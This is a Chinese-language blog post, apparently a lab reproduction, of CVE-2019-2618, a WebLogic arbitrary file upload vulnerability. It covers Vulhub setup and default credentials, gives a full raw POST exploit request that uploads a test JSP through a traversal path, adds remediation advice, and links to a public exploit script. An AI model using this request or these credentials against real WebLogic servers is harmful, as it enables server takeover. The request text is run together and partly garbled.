weblogic 文件打开数_WebLogic任意文件上传漏洞(CVE20192618)复现

1.漏洞介绍

CVE-2019-2618漏洞主要是利用了WebLogic组件中的DeploymentService接口,该接口支持向服务器上传任意文件。攻击者突破了OAM(Oracle Access Management)认证,设置wl_request_type参数为app_upload,构造文件上传格式的POST请求包,上传jsp木马文件,进而可以获得整个服务器的权限。

2.影响版本

WebLogic 10.3.6.0、12.1.3.0、12.2.1.3

3.漏洞复现

3.1漏洞环境

使用Vulhub里面的CVE-2017-10271环境作为漏洞环境

root@kali:~/vulhub/weblogic/CVE-2017-10271# ls
1.png docker-compose.yml README.md set_mirror.sh

root@kali:~/vulhub/weblogic/CVE-2017-10271# docker-compose up -d

访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动

bd87b6d876ae7bab0fdddf142a67ea06.png

3.2漏洞利用

需要获取weblogic的登陆权限

可尝试以下默认口令

weblogic/weblogic

weblogic/Oracle@123

POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1Host: 192.168.64.161:7001Connection: closeAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.21.0username: weblogicwl_request_type: app_uploadcache-control: no-cachewl_upload_application_name: /../tmp/_WL_internal/bea_wls_internal/9j4dqk/warserverName: testpassword: Oracle@123content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gWarchive: trueserver_version: 10.3.6.0wl_upload_delta: trueContent-Length: 1081------WebKitFormBoundary7MA4YWxkTrZu0gWContent-Disposition: form-data; name="img"; filename="test.jsp"Content-Type: false        out.print("123456");%>------WebKitFormBoundary7MA4YWxkTrZu0gW--

abade96ce3cae26b21d155da1a60783d.png

4.修复建议

1、加强密码口令

2、Oracle官方已经在关键补丁更新(CPU)中修复了该漏洞

链接:

https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html

5.工具利用

大佬脚本

https://github.com/jas502n/cve-2019-2618

7349b7de60c811d97c14f3b4d51b7719.gif

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值